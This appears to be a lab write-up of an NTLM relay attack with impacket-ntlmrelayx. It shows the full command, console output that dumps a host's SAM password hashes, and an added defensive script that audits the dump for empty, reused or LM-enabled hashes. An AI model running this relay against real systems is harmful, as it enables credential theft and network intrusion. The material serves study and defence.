# Analysis of impacket-ntlmrelayx

1. <mark style="color:red;">**Attack Configuration**</mark><mark style="color:red;">:</mark>
   * The command run, `impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249`, sets up an NTLM relay attack.
   * `--no-http-server`: Indicates that no HTTP server should be started for the relay.
   * `-smb2support`: Enables support for SMB version 2.
   * `-t smb://10.0.1.249`: Defines the target of the attack, in this case a server with IP address `10.0.1.249` reachable over the SMB protocol.
2. <mark style="color:red;">**Loading of Client Protocols**</mark><mark style="color:red;">:</mark>
   * The tool loads several client protocols: DCSYNC, LDAPS, LDAP, IMAP(S), SMTP, HTTP(S), MSSQL, SMB and RPC. This means it is ready to relay credentials over any of these protocols.
3. <mark style="color:red;">**Server Setup**</mark><mark style="color:red;">:</mark>
   * It sets up several servers, including SMB, WCF and a RAW server on port 6666, to listen for incoming connections and relay them where possible.
4. <mark style="color:red;">**Relay Attack**</mark><mark style="color:red;">:</mark>
   * It receives a connection from `10.0.1.100` and successfully authenticates against the target `smb://10.0.1.249` as `SPARTANCYBERSEC/ADMIN`.
   * Once the connection is under its control, it reports that there are no more targets left.
5. <mark style="color:red;">**Exploitation and Hash Extraction**</mark><mark style="color:red;">:</mark>
   * The tool manipulates services on the target system, such as starting the `RemoteRegistry` service.
   * It extracts the target system's `bootKey`, which is essential for decrypting the locally stored hashes.
   * Finally, it dumps the SAM (Security Accounts Manager) hashes of the target system, including user accounts such as `Administrator`, `Guest` and `DefaultAccount`, among others.

```bash
┌──(root㉿kali)-[/home/kali]
└─# impacket-ntlmrelayx --no-http-server -smb2support -t smb://10.0.1.249
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client DCSYNC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client RPC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Received connection from 10.0.1.100, attacking target smb://10.0.1.249
[*] Authenticating against smb://10.0.1.249 as SPARTANCYBERSEC/ADMIN SUCCEED
[*] SMBD-Thread-6 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.0.1.100 controlled, but there are no more targets left!
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xea7b3f466f263386e6dc165bcde0d1d2
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
demo:1010:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
Jorl:1011:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
[*] Stopping service RemoteRegistry
```
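As an added example (not part of the original page or of Impacket), the following Python script parses the `uid:rid:lmhash:nthash:::` lines of a dump like the one above, as a defender reviewing the result of such a relay test would, and flags the weaknesses visible in it: accounts with an empty NT password hash, accounts whose LM hash is not the "disabled" value, and the same NT hash shared by several accounts (password reuse). The sample input is a subset of the lines shown above; the two well-known constant hashes are the standard empty-LM and empty-NT values.

```python
import re
from collections import defaultdict

# Well-known constants: LM hash stored when LM hashing is disabled, and NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Sample input: a subset of the dump lines shown above, including the tool's status lines.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f47f6266f4bb428db65cd949e7537f52:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
prueba:1005:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
gerh:1006:aad3b435b51404eeaad3b435b51404ee:ac1dbef8523bafece1428e067c1b114f:::
[*] Done dumping SAM hashes for host: 10.0.1.249
"""

# One SAM entry: user, RID, 32-hex LM hash, 32-hex NT hash, trailing ':::'.
LINE_RE = re.compile(r"^([^:\s]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$", re.I)


def parse_sam_dump(text):
    """Return (user, rid, lmhash, nthash) tuples; status lines such as '[*] ...' are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            user, rid, lm, nt = m.groups()
            entries.append((user, int(rid), lm.lower(), nt.lower()))
    return entries


def assess(entries):
    """Flag LM hashes still enabled, empty passwords and NT hashes shared by several accounts."""
    findings = {"lm_enabled": [], "empty_password": [], "reused_nt": {}}
    by_nt = defaultdict(list)
    for user, rid, lm, nt in entries:
        if lm != EMPTY_LM:
            findings["lm_enabled"].append(user)
        if nt == EMPTY_NT:
            # Built-in Guest/DefaultAccount are normally disabled; verify the account state before acting.
            findings["empty_password"].append(user)
        else:
            by_nt[nt].append(user)
    findings["reused_nt"] = {h: users for h, users in by_nt.items() if len(users) > 1}
    return findings


if __name__ == "__main__":
    print(assess(parse_sam_dump(SAMPLE_DUMP)))
```

In the full dump above the same check also groups `demo` and `Jorl` with `prueba` and `gerh`, since all four share one NT hash.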
